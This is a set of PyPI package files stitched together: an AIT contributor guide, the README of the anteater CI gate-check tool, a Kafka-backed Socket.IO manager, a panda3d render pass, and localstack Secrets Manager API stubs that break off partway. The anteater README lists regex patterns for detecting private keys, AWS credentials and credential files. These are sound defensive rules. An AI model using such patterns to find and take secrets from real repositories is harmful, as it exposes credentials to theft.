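    pyenv install 3.10.13
    # point poetry at it and open a shell in the resulting environment
    poetry env use $(pyenv which python3.10)
    poetry shell
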
Install the package in "editable" mode with all the development dependencies by running the following::
poetry install
As with a normal installation you will need to point `AIT_CONFIG` at the primary configuration file. You should consider saving this in your shell RC file or your virtual environment configuration files so you don't have to reset it with every new shell::
export AIT_CONFIG=/path/to/ait-core/config/config.yaml
You should configure `pre-commit` by running the following. This will install our pre-commit and pre-push hooks::
pre-commit install && pre-commit install -t pre-push
Finally, you should install the different Python versions that the project supports so they're accessible to `tox`. Using `pyenv` is the easiest way to accomplish this::
cat .python-version | xargs -I{} pyenv install --skip-existing {}
Dev Tools
---------
Tox
~~~
Use `tox` to run a thorough build of the toolkit that checks test execution across different Python versions, verifies the docs build, runs the linting pipeline, and checks that the repo packages cleanly. Make sure you run `tox` in Poetry's `shell` without another virtual environment active to avoid problems with `tox` finding different python versions for the tests. You can run all of the development tools with::
tox
You can list the available `tox` test environments by passing `-l` and execute a specific one by passing its name to `-e`. Run `tox -h` for more info.
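For example, to list the configured environments and then run only the documentation build::

    tox -l
    tox -e docs
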
Tests
~~~~~
Use `pytest` to manually run the test suite::
pytest
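If you only need to exercise part of the suite, `pytest` can also filter tests with a keyword expression; the keyword shown here is just an illustration::

    pytest -k telemetry
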
Or via `tox` for a specific python version::
tox -e py310
Code Checks
~~~~~~~~~~~
We run ``black``, ``flake8``, ``mypy``, and a few other minor checkers on the code base. Our linting and code check pipeline is run whenever you commit or push. If you'd like to run it manually you can do so with the following::
pre-commit run --color=always --all-files
Individual calls to the tools are configured in ``.pre-commit-config.yaml``. If you'd like to run a specific tool on its own you can see how we call them there.
You can run all the linting tools with tox as well::
tox -e lint
Documentation
~~~~~~~~~~~~~
AIT uses Sphinx to build its documentation. You can build the documentation with::
poetry run build_sphinx
To view the documentation, open ``doc/build/html/index.html`` in a web browser. If you just want to check that the docs build is working you can use tox::
tox -e docs
If you need to update the auto-generated documentation you can run the following command to rebuild all of the package documentation::
sphinx-apidoc --separate --force --no-toc -o doc/source ait --implicit-namespaces
Please make sure to update the docs if changes in a ticket result in the documentation being out of date.
Project Workflow
----------------
Issue Tracking
~~~~~~~~~~~~~~
All changes need to be made against one or more tickets for tracking purposes. AIT uses GitHub Issues along with Zenhub to track issues in the project. All tickets should have (outside of rare edge-cases):
- A concise title
- An in-depth description of the problem / request. If reporting a bug, the description should include information on how to reproduce the bug. Also include the version of the code where you’re seeing the bug.
If you’re going to begin work on a ticket make sure to progress the ticket through the various Pipeline steps as appropriate as well as assigning yourself as an Assignee. If you lack sufficient permissions to do so you can post on the ticket asking for the above to be done for you.
Commit Messages
~~~~~~~~~~~~~~~
AIT projects take a fairly standard approach to commit message formatting. You can check out Tim Pope's blog for a good starting point to figuring out how to format your commit messages. All commit messages should reference a ticket in their title / summary line::
Issue #248 - Show an example commit message title
This makes sure that tickets are updated on GitHub with references to commits that are related to them.
Commits should always be atomic. Keep solutions isolated whenever possible. Filler commits such as "clean up white space" or "fix typo" should be rebased out before making a pull request. Please ensure your commit history is clean and meaningful!
Code Formatting and Style
~~~~~~~~~~~~~~~~~~~~~~~~~
AIT makes a best-effort attempt at sticking with PEP-8 conventions. This is enforced automatically by ``black`` and checked by ``flake8``. You should run the ``pre-commit`` linting pipeline on any changes you make.
Testing
~~~~~~~
We do our best to make sure that all of our changes are tested. If you're fixing a bug you should always have an accompanying unit test to ensure we don't regress!
Check the Developer Tips section below for information on running each repository's test suite.
Pull Requests and Feature Branches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
All changes should be isolated to a feature branch that links to a ticket. The standard across AIT projects is to use issue-### for branch names where ### is the issue number found on GitHub.
The title of a pull request should include a reference to the ticket being fixed as mentioned for commit messages. The description of a pull request should provide an in-depth explanation of the changes present. Note, if you wrote good commit messages this step should be easy!
Any tickets that are resolved by the pull request should be referenced with GitHub's syntax for closing out tickets. Assuming the above ticket we would have the following in a pull request description::
Resolve #248
Changes are required to be reviewed by at least one member of the AIT PMC/Committers groups, tests must pass, and the branch must be up to date with master before changes will be merged. If changes are made as part of code review please ensure your commit history is cleaned up.
| PypiClean |
/anteater-0.23.tar.gz/anteater-0.23/README.md | # Anteater - CI/CD Gate Check Framework

[](https://travis-ci.org/anteater/anteater)
[](http://anteater.readthedocs.io/en/latest/?badge=latest)
Description
-----------
Anteater is an open framework to prevent the unwanted merging of nominated strings,
filenames, binaries, deprecated functions, staging environment code / credentials,
etc. Anything that can be specified with regular expression syntax can be
sniffed out by anteater.
You tell anteater exactly what you don't want to get merged, and anteater looks
after the rest.
If anteater finds something, it exits with a non-zero code which in turn fails
the build of your CI tool, with the idea that it would prevent a pull request
from merging. Any false positives are easily negated by using the
same RegExp framework to cancel out the false match.
Entire projects may also be scanned, using a recursive directory walk.
With a few simple steps it can be easily implemented into a CI / CD workflow
with tooling such as [Travis CI](https://travis-ci.org/), [CircleCI](https://circleci.com/), [Gitlab CI/CD](https://about.gitlab.com/features/gitlab-ci-cd/) and [Jenkins](https://jenkins.io/).
It is currently used in the Linux Foundation project ['OPNFV'](https://opnfv.org)
as a means to provide automated security checks at gate, but as shown in the
examples below, it can be used for other scenarios.
Anteater also integrates with the Virus Total API, so any binaries,
public IP addresses or URLs found by anteater will be sent to the Virus Total
API and a report will be returned. If any object is reported as malicious,
it will fail the CI build job.
Example content is provided for those unsure of what to start with, and you are
encouraged and welcome to share any Anteater filter strings you find useful.
Why would I want to use this?
-----------------------------
Anteater has many uses, and can easily be bent to cover your own specific needs.
First, as mentioned, it can be set up to block strings and files with a
potential security impact or risk. This could include private keys, a shell
history, aws credentials etc.
It is especially useful for ensuring that elements used in a staging /
development environment don't find their way into a production environment.
Let's take a look at some examples:
```
apprun:
regex: app\.run\s*\(.*debug.*=.*True.*\)
desc: "Running flask in debug mode could potentially leak sensitive data"
```
The above will match code where a flask server is set to run in debug mode,
`` app.run(host='0.0.0.0', port=80, debug=True)``, which can be typical of a
developer's environment and mistakenly staged into production.
For a rails app, this could be:
`` regex: \<%=.*debug.*%>``
Even more simple, look for the following in most logging frameworks:
`` regex: log\.debug``
Need to stop developers mistakenly adding a private key?
```
private_key:
regex: -----BEGIN\sRSA\sPRIVATE\sKEY----
desc: "This looks like it could be a private key"
```
How about credential files that would cause a job loss if ever leaked into
production? Anteater works with file names too.
For Example:
``jenkins\.plugins\.publish_over_ssh\.BapSshPublisherPlugin\.xml``
Or even..
```
- \.pypirc
- \.gem\/credentials
- aws_access_key_id
- aws_secret_access_key
- LocalSettings\.php
```
If your app has its own custom secrets / config file, then it's very easy to
add your own regular expressions. Everything is set using YAML formatting,
so there is no need to change anteater's code.
Deprecated functions, classes etc
----------------------------------
Another use is for when a project deprecates an old function, yet developers
might still make pull requests using the old function naming:
```
deprecated_function:
  regex: deprecated_function\(.*\)
  desc: This function was deprecated in release X, use Y function.
```
Or perhaps stopping people from using 1.x versions of a framework:
``<script.src.*="https:\/\/ajax\.googleapis\.com\/ajax\/libs\/angularjs\/1.*<\/script>``
What if I get false positives?
-----------------------------
Easy, you set a RegExp to stop the match, kind of like RegExp'ception.
Let's say we want to stop use of MD5:
```
md245:
regex: md[245]
desc: "Insecure hashing algorithm"
```
This then incorrectly gets matched to the following:
``mystring = int(amd500) * 4``
We set a specific ignore RegEx, so it matches and then is unmatched by the
ignore entry.
``mystring.=.int\(amd500\).*``
Yet other instances of ``MD5`` continue to get flagged.
Binaries
--------
With anteater, if you pass the argument ``--binaries``, any binary found
causes a build failure on the originating pull request. It is not until a
sha256 checksum is set within anteater's YAML ignore files, that the build is
allowed to pass.
This means you can block people from checking in compiled objects, images, PDFs,
etc. that may have an unknown origin, as well as tampering with existing binary files.
An example:
```
$ anteater --binaries --project myproj --patchset /tmp/patch
Non Whitelisted Binary file: /folder/to/repo/images/pal.png
Please submit patch with this hash: 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
```
Let's enter the hash::
```
binaries:
images/pal.png:
- 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
```
Run the job again::
```
$ anteater --binaries --project myproj --patchset /tmp/patch
Found matching file hash for: /folder/to/repo/images/pal.png
```
This way we can be sure binaries are not tampered with, since any change breaks
the cryptographic signature / checksum.
Any binaries not having a sha256 checksum will also be sent to the Virus Total
API for scanning.
Virus Total API
---------------
If the following flags (combined or individually) ``--ips``, ``--urls``, ``--binaries``
are used, anteater will perform a lookup against the Virus Total API.
IP addresses will have their DNS history checked for any previous or present connection
with known blacklisted domains marked as malicious or containing malware.
URLs will be checked for any previous or present connection with known blacklisted domains
marked as malicious or containing malware.
As mentioned, binaries will be sent to Virus Total and verified as clean / infected.
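For example, a gate job that runs all three checks at once could be invoked as
follows (the project name and patchset path are illustrative, matching the
earlier examples):
```
$ anteater --ips --urls --binaries --project myproj --patchset /tmp/patch
```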
For more details and in-depth documentation, please visit [readthedocs](http://anteater.readthedocs.io/en/latest/)
Last of all, if you do use anteater, I would love to know (twitter: @decodebytes)
and pull requests / issues are welcome!
Contribute
----------
Contributions are welcome.
Please make a pull request in a new branch, and not master.
```
git checkout -b mypatch
```
```
git push origin mypatch
```
Unit tests and PEP8 checks are in tox, so simply run the `tox` command before
pushing your code.
If your patch fixes an issue, please paste the issue URL into the commit
message.
| PypiClean |
/sio/client_manager.py | import asyncio
import typing
from typing import (
Any,
AsyncGenerator,
AsyncIterator,
Dict,
Self,
)
from aiokafka.errors import KafkaConnectionError
from async_generator import asynccontextmanager
from socketio.asyncio_pubsub_manager import AsyncPubSubManager
from ..kafka.utils import get_kafka_consumer, get_kafka_producer
class Unsubscribed(Exception):
pass
class KafkaEvent:
def __init__(self, channel: str, message: str) -> None:
self.channel = channel
self.message = message
def __eq__(self, other: object) -> bool:
return (
isinstance(other, KafkaEvent)
and self.channel == other.channel
and self.message == other.message
)
def __repr__(self) -> str:
return f"Event(channel={self.channel!r}, message={self.message!r})"
class Subscriber:
def __init__(self, queue: asyncio.Queue) -> None:
self._queue = queue
async def __aiter__(self) -> AsyncGenerator:
try:
while True:
yield await self.get()
except Unsubscribed:
pass
async def __aexit__(self, exc_type, exc_value, exc_tb):
...
async def get(self) -> KafkaEvent:
item = await self._queue.get()
if item is None:
raise Unsubscribed()
return item
class KafkaBackend:
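    """Minimal pub/sub backend built on an aiokafka producer/consumer pair.

    ``publish`` sends a message to a topic, ``subscribe`` adds a topic to the
    consumer's subscription set, and ``next_published`` returns the next
    consumed record wrapped in a ``KafkaEvent``.
    """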
def __init__(self, url: str, group_id: str | None = None):
self._servers = url
self._consumer_channels: typing.Set = set()
self.group_id = group_id
async def connect(self) -> None:
self._producer = get_kafka_producer(bootstrap_servers=self._servers)
self._consumer = get_kafka_consumer(bootstrap_servers=self._servers, group_id=self.group_id)
await self._producer.start()
await self._consumer.start()
async def disconnect(self) -> None:
await self._producer.stop()
await self._consumer.stop()
async def subscribe(self, channel: str) -> None:
self._consumer_channels.add(channel)
self._consumer.subscribe(topics=self._consumer_channels)
async def unsubscribe(self, channel: str) -> None:
self._consumer.unsubscribe()
async def publish(self, channel: str, message: typing.Any) -> None:
await self._producer.send_and_wait(channel, message)
async def next_published(self) -> KafkaEvent:
message = await self._consumer.getone()
return KafkaEvent(channel=message.topic, message=message.value)
class SocketIoClientManager(AsyncPubSubManager):
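    """Socket.IO pub/sub manager that fans events out through Kafka.

    Emitted events are published to ``self.channel``; a background listener
    task consumes that topic and pushes each event onto the queues of local
    subscribers, so multiple server instances stay in sync.
    """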
def __init__(
self,
kafka_backend: KafkaBackend,
channel="socketio",
write_only=False,
logger=None,
):
super().__init__(channel, write_only, logger)
self.kafka_backend: KafkaBackend = kafka_backend
self._subscribers: Dict[str, Any] = {}
self._backend = kafka_backend
async def __aenter__(self) -> Self:
await self.on_start()
return self
async def __aexit__(self, *args: Any, **kwargs: Any) -> None:
await self.on_shutdown()
async def _listener(self) -> None:
while True:
event = await self._backend.next_published()
for queue in list(self._subscribers.get(event.channel, [])):
await queue.put(event)
async def on_start(self) -> None:
try:
await self._backend.connect()
except KafkaConnectionError as e:
await self.kafka_backend.disconnect()
raise RuntimeError("unable to connect to kafka")
self._listener_task = asyncio.create_task(self._listener())
async def on_shutdown(self) -> None:
if self._listener_task.done():
self._listener_task.result()
else:
self._listener_task.cancel()
await self._backend.disconnect()
@asynccontextmanager
async def subscribe(self, channel: str) -> AsyncIterator["Subscriber"]:
queue: asyncio.Queue = asyncio.Queue()
try:
if not self._subscribers.get(channel):
await self._backend.subscribe(channel)
self._subscribers[channel] = set([queue])
else:
self._subscribers[channel].add(queue)
yield Subscriber(queue)
self._subscribers[channel].remove(queue)
if not self._subscribers.get(channel):
del self._subscribers[channel]
await self._backend.unsubscribe(channel)
finally:
await queue.put(None)
async def _publish(self, message: Any):
await self._backend.publish(self.channel, message)
async def _listen(self):
async with self.subscribe(channel=self.channel) as subscriber: # type:ignore
async for event in subscriber:
yield event.message | PypiClean |
/panda3d_lion_render-0.1.0-py3-none-any.whl/lionrender/renderpass.py | import panda3d.core as p3d
class Pass:
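    """A single offscreen render pass.

    Renders either a caller-supplied scene or a generated fullscreen quad into
    an offscreen buffer. The rendered textures are exposed through
    ``self.outputs`` (and ``self.output``) so they can feed later passes or be
    displayed with ``output_to``.
    """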
def __init__(
self,
name,
pipe=None,
engine=None,
window=None,
camera=None,
scene=None,
shader=None,
frame_buffer_properties=None,
clear_color=p3d.LColor(0.41, 0.41, 0.41, 0.0),
share_depth_with=None,
):
self.name = name
self._pipe = pipe if pipe else base.pipe
self._engine = engine if engine else base.graphics_engine
self._window = window if window else base.win
self.node_path = p3d.NodePath(p3d.ModelNode(f'{self.name}_node_path'))
if scene:
scene.instance_to(self.node_path)
else:
quad = self._make_fullscreen_quad()
quad.reparent_to(self.node_path)
if shader:
self.node_path.set_shader(shader)
if not frame_buffer_properties:
frame_buffer_properties = self._make_default_buffer_props()
output_count = self._count_outputs(frame_buffer_properties)
self._camera = self._make_camera(camera)
self.buffer = self._make_buffer(frame_buffer_properties)
if share_depth_with:
success = self.buffer.share_depth_buffer(share_depth_with.buffer)
if success:
self.buffer.set_clear_depth_active(False)
self.node_path.set_attrib(p3d.DepthTestAttrib.make(p3d.RenderAttrib.MLessEqual))
else:
raise Exception('Unable to share depth buffer')
self.outputs = self._make_outputs(output_count)
self.output = self.outputs[0] if self.outputs else None
self.display_region = self.buffer.make_display_region(0, 1, 0, 1)
if self._camera:
self.display_region.set_camera(self._camera)
self.buffer.set_clear_color(clear_color)
def output_to(self, render2d, index=0):
card = self.buffer.getTextureCard()
card.setTexture(self.outputs[index])
card.reparentTo(render2d)
def _count_outputs(self, fb_props):
count = 0
if fb_props.get_rgb_color():
count += 1
count += fb_props.get_aux_rgba()
return count
def _make_outputs(self, count):
outputs = [p3d.Texture(f'{self.name}_output_{i}') for i in range(count)]
for i, output in enumerate(outputs):
attach_point = p3d.GraphicsOutput.RTP_color
if i > 0:
attach_point = getattr(p3d.GraphicsOutput, f'RTP_aux_rgba_{i - 1}')
self.buffer.add_render_texture(
output,
p3d.GraphicsOutput.RTM_bind_or_copy,
attach_point
)
return outputs
def _make_camera(self, source_cam):
cam = p3d.Camera(f'{self.name}_camera')
cam_nodepath = self.node_path.attach_new_node(cam)
cam.set_scene(self.node_path)
if source_cam:
def update(callback_data):
try:
lens = source_cam.get_node(0).get_lens()
except AttributeError:
lens = source_cam.find('**/+Camera').get_node(0).get_lens()
cam.set_lens(lens)
cam_nodepath.set_pos(source_cam.get_pos(self.node_path))
cam_nodepath.set_hpr(source_cam.get_hpr(self.node_path))
callback_data.upcall()
callback = p3d.CallbackNode(f'{self.name}_update_camera')
callback.set_cull_callback(update)
cam_nodepath.attach_new_node(callback)
return cam_nodepath
def _make_default_buffer_props(self):
fb_props = p3d.FrameBufferProperties()
fb_props.set_rgb_color(True)
fb_props.set_rgba_bits(8, 8, 8, 0)
fb_props.set_depth_bits(24)
return fb_props
def _make_buffer(self, fb_props):
return self._engine.make_output(
self._pipe,
self.name,
0,
fb_props,
p3d.WindowProperties(),
p3d.GraphicsPipe.BF_refuse_window | p3d.GraphicsPipe.BF_size_track_host,
self._window.get_gsg(),
self._window
)
def _make_fullscreen_quad(self):
tris = p3d.GeomTristrips(p3d.GeomEnums.UH_static)
tris.add_next_vertices(4)
vdata = p3d.GeomVertexData(
'abc',
p3d.GeomVertexFormat.get_empty(),
p3d.GeomEnums.UH_static
)
geom = p3d.Geom(vdata)
geom.add_primitive(tris)
geom.set_bounds(p3d.OmniBoundingVolume())
node = p3d.GeomNode(f'{self.name}_fullscreen_quad')
node.add_geom(geom)
return p3d.NodePath(node) | PypiClean |
/localstack_core-2.2.0-py3-none-any.whl/localstack/aws/api/secretsmanager/__init__.py | import sys
from datetime import datetime
from typing import Dict, List, Optional
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
from localstack.aws.api import RequestContext, ServiceException, ServiceRequest, handler
BooleanType = bool
ClientRequestTokenType = str
DescriptionType = str
DurationType = str
ErrorMessage = str
ExcludeCharactersType = str
ExcludeLowercaseType = bool
ExcludeNumbersType = bool
ExcludePunctuationType = bool
ExcludeUppercaseType = bool
FilterValueStringType = str
IncludeSpaceType = bool
KmsKeyIdType = str
MaxResultsType = int
NameType = str
NextTokenType = str
NonEmptyResourcePolicyType = str
OwningServiceType = str
RandomPasswordType = str
RegionType = str
RequireEachIncludedTypeType = bool
RotationEnabledType = bool
RotationLambdaARNType = str
ScheduleExpressionType = str
SecretARNType = str
SecretIdType = str
SecretNameType = str
SecretStringType = str
SecretVersionIdType = str
SecretVersionStageType = str
StatusMessageType = str
TagKeyType = str
TagValueType = str
class FilterNameStringType(str):
description = "description"
name = "name"
tag_key = "tag-key"
tag_value = "tag-value"
primary_region = "primary-region"
owning_service = "owning-service"
all = "all"
class SortOrderType(str):
asc = "asc"
desc = "desc"
class StatusType(str):
InSync = "InSync"
Failed = "Failed"
InProgress = "InProgress"
class DecryptionFailure(ServiceException):
code: str = "DecryptionFailure"
sender_fault: bool = False
status_code: int = 400
class EncryptionFailure(ServiceException):
code: str = "EncryptionFailure"
sender_fault: bool = False
status_code: int = 400
class InternalServiceError(ServiceException):
code: str = "InternalServiceError"
sender_fault: bool = False
status_code: int = 400
class InvalidNextTokenException(ServiceException):
code: str = "InvalidNextTokenException"
sender_fault: bool = False
status_code: int = 400
class InvalidParameterException(ServiceException):
code: str = "InvalidParameterException"
sender_fault: bool = False
status_code: int = 400
class InvalidRequestException(ServiceException):
code: str = "InvalidRequestException"
sender_fault: bool = False
status_code: int = 400
class LimitExceededException(ServiceException):
code: str = "LimitExceededException"
sender_fault: bool = False
status_code: int = 400
class MalformedPolicyDocumentException(ServiceException):
code: str = "MalformedPolicyDocumentException"
sender_fault: bool = False
status_code: int = 400
class PreconditionNotMetException(ServiceException):
code: str = "PreconditionNotMetException"
sender_fault: bool = False
status_code: int = 400
class PublicPolicyException(ServiceException):
code: str = "PublicPolicyException"
sender_fault: bool = False
status_code: int = 400
class ResourceExistsException(ServiceException):
code: str = "ResourceExistsException"
sender_fault: bool = False
status_code: int = 400
class ResourceNotFoundException(ServiceException):
code: str = "ResourceNotFoundException"
sender_fault: bool = False
status_code: int = 400
class ReplicaRegionType(TypedDict, total=False):
Region: Optional[RegionType]
KmsKeyId: Optional[KmsKeyIdType]
AddReplicaRegionListType = List[ReplicaRegionType]
AutomaticallyRotateAfterDaysType = int
class CancelRotateSecretRequest(ServiceRequest):
SecretId: SecretIdType
class CancelRotateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class Tag(TypedDict, total=False):
Key: Optional[TagKeyType]
Value: Optional[TagValueType]
TagListType = List[Tag]
SecretBinaryType = bytes
class CreateSecretRequest(ServiceRequest):
Name: NameType
ClientRequestToken: Optional[ClientRequestTokenType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
Tags: Optional[TagListType]
AddReplicaRegions: Optional[AddReplicaRegionListType]
ForceOverwriteReplicaSecret: Optional[BooleanType]
LastAccessedDateType = datetime
class ReplicationStatusType(TypedDict, total=False):
Region: Optional[RegionType]
KmsKeyId: Optional[KmsKeyIdType]
Status: Optional[StatusType]
StatusMessage: Optional[StatusMessageType]
LastAccessedDate: Optional[LastAccessedDateType]
ReplicationStatusListType = List[ReplicationStatusType]
class CreateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
ReplicationStatus: Optional[ReplicationStatusListType]
CreatedDateType = datetime
class DeleteResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
class DeleteResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
RecoveryWindowInDaysType = int
class DeleteSecretRequest(ServiceRequest):
SecretId: SecretIdType
RecoveryWindowInDays: Optional[RecoveryWindowInDaysType]
ForceDeleteWithoutRecovery: Optional[BooleanType]
DeletionDateType = datetime
class DeleteSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
DeletionDate: Optional[DeletionDateType]
DeletedDateType = datetime
class DescribeSecretRequest(ServiceRequest):
SecretId: SecretIdType
TimestampType = datetime
SecretVersionStagesType = List[SecretVersionStageType]
SecretVersionsToStagesMapType = Dict[SecretVersionIdType, SecretVersionStagesType]
NextRotationDateType = datetime
LastChangedDateType = datetime
LastRotatedDateType = datetime
class RotationRulesType(TypedDict, total=False):
AutomaticallyAfterDays: Optional[AutomaticallyRotateAfterDaysType]
Duration: Optional[DurationType]
ScheduleExpression: Optional[ScheduleExpressionType]
class DescribeSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
RotationEnabled: Optional[RotationEnabledType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
LastRotatedDate: Optional[LastRotatedDateType]
LastChangedDate: Optional[LastChangedDateType]
LastAccessedDate: Optional[LastAccessedDateType]
DeletedDate: Optional[DeletedDateType]
NextRotationDate: Optional[NextRotationDateType]
Tags: Optional[TagListType]
VersionIdsToStages: Optional[SecretVersionsToStagesMapType]
OwningService: Optional[OwningServiceType]
CreatedDate: Optional[TimestampType]
PrimaryRegion: Optional[RegionType]
ReplicationStatus: Optional[ReplicationStatusListType]
FilterValuesStringList = List[FilterValueStringType]
class Filter(TypedDict, total=False):
Key: Optional[FilterNameStringType]
Values: Optional[FilterValuesStringList]
FiltersListType = List[Filter]
PasswordLengthType = int
class GetRandomPasswordRequest(ServiceRequest):
PasswordLength: Optional[PasswordLengthType]
ExcludeCharacters: Optional[ExcludeCharactersType]
ExcludeNumbers: Optional[ExcludeNumbersType]
ExcludePunctuation: Optional[ExcludePunctuationType]
ExcludeUppercase: Optional[ExcludeUppercaseType]
ExcludeLowercase: Optional[ExcludeLowercaseType]
IncludeSpace: Optional[IncludeSpaceType]
RequireEachIncludedType: Optional[RequireEachIncludedTypeType]
class GetRandomPasswordResponse(TypedDict, total=False):
RandomPassword: Optional[RandomPasswordType]
class GetResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
class GetResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
ResourcePolicy: Optional[NonEmptyResourcePolicyType]
class GetSecretValueRequest(ServiceRequest):
SecretId: SecretIdType
VersionId: Optional[SecretVersionIdType]
VersionStage: Optional[SecretVersionStageType]
class GetSecretValueResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
VersionStages: Optional[SecretVersionStagesType]
CreatedDate: Optional[CreatedDateType]
KmsKeyIdListType = List[KmsKeyIdType]
class ListSecretVersionIdsRequest(ServiceRequest):
SecretId: SecretIdType
MaxResults: Optional[MaxResultsType]
NextToken: Optional[NextTokenType]
IncludeDeprecated: Optional[BooleanType]
class SecretVersionsListEntry(TypedDict, total=False):
VersionId: Optional[SecretVersionIdType]
VersionStages: Optional[SecretVersionStagesType]
LastAccessedDate: Optional[LastAccessedDateType]
CreatedDate: Optional[CreatedDateType]
KmsKeyIds: Optional[KmsKeyIdListType]
SecretVersionsListType = List[SecretVersionsListEntry]
class ListSecretVersionIdsResponse(TypedDict, total=False):
Versions: Optional[SecretVersionsListType]
NextToken: Optional[NextTokenType]
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class ListSecretsRequest(ServiceRequest):
IncludePlannedDeletion: Optional[BooleanType]
MaxResults: Optional[MaxResultsType]
NextToken: Optional[NextTokenType]
Filters: Optional[FiltersListType]
SortOrder: Optional[SortOrderType]
class SecretListEntry(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
RotationEnabled: Optional[RotationEnabledType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
LastRotatedDate: Optional[LastRotatedDateType]
LastChangedDate: Optional[LastChangedDateType]
LastAccessedDate: Optional[LastAccessedDateType]
DeletedDate: Optional[DeletedDateType]
NextRotationDate: Optional[NextRotationDateType]
Tags: Optional[TagListType]
SecretVersionsToStages: Optional[SecretVersionsToStagesMapType]
OwningService: Optional[OwningServiceType]
CreatedDate: Optional[TimestampType]
PrimaryRegion: Optional[RegionType]
SecretListType = List[SecretListEntry]
class ListSecretsResponse(TypedDict, total=False):
SecretList: Optional[SecretListType]
NextToken: Optional[NextTokenType]
class PutResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
ResourcePolicy: NonEmptyResourcePolicyType
BlockPublicPolicy: Optional[BooleanType]
class PutResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
class PutSecretValueRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
VersionStages: Optional[SecretVersionStagesType]
class PutSecretValueResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
VersionStages: Optional[SecretVersionStagesType]
RemoveReplicaRegionListType = List[RegionType]
class RemoveRegionsFromReplicationRequest(ServiceRequest):
SecretId: SecretIdType
RemoveReplicaRegions: RemoveReplicaRegionListType
class RemoveRegionsFromReplicationResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
ReplicationStatus: Optional[ReplicationStatusListType]
class ReplicateSecretToRegionsRequest(ServiceRequest):
SecretId: SecretIdType
AddReplicaRegions: AddReplicaRegionListType
ForceOverwriteReplicaSecret: Optional[BooleanType]
class ReplicateSecretToRegionsResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
ReplicationStatus: Optional[ReplicationStatusListType]
class RestoreSecretRequest(ServiceRequest):
SecretId: SecretIdType
class RestoreSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class RotateSecretRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
RotateImmediately: Optional[BooleanType]
class RotateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class StopReplicationToReplicaRequest(ServiceRequest):
SecretId: SecretIdType
class StopReplicationToReplicaResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
TagKeyListType = List[TagKeyType]
class TagResourceRequest(ServiceRequest):
SecretId: SecretIdType
Tags: TagListType
class UntagResourceRequest(ServiceRequest):
SecretId: SecretIdType
TagKeys: TagKeyListType
class UpdateSecretRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
class UpdateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class UpdateSecretVersionStageRequest(ServiceRequest):
SecretId: SecretIdType
VersionStage: SecretVersionStageType
RemoveFromVersionId: Optional[SecretVersionIdType]
MoveToVersionId: Optional[SecretVersionIdType]
class UpdateSecretVersionStageResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class ValidateResourcePolicyRequest(ServiceRequest):
SecretId: Optional[SecretIdType]
ResourcePolicy: NonEmptyResourcePolicyType
class ValidationErrorsEntry(TypedDict, total=False):
CheckName: Optional[NameType]
ErrorMessage: Optional[ErrorMessage]
ValidationErrorsType = List[ValidationErrorsEntry]
class ValidateResourcePolicyResponse(TypedDict, total=False):
PolicyValidationPassed: Optional[BooleanType]
ValidationErrors: Optional[ValidationErrorsType]
class SecretsmanagerApi:
service = "secretsmanager"
version = "2017-10-17"
@handler("CancelRotateSecret")
def cancel_rotate_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> CancelRotateSecretResponse:
raise NotImplementedError
@handler("CreateSecret")
def create_secret(
self,
context: RequestContext,
name: NameType,
client_request_token: ClientRequestTokenType = None,
description: DescriptionType = None,
kms_key_id: KmsKeyIdType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
tags: TagListType = None,
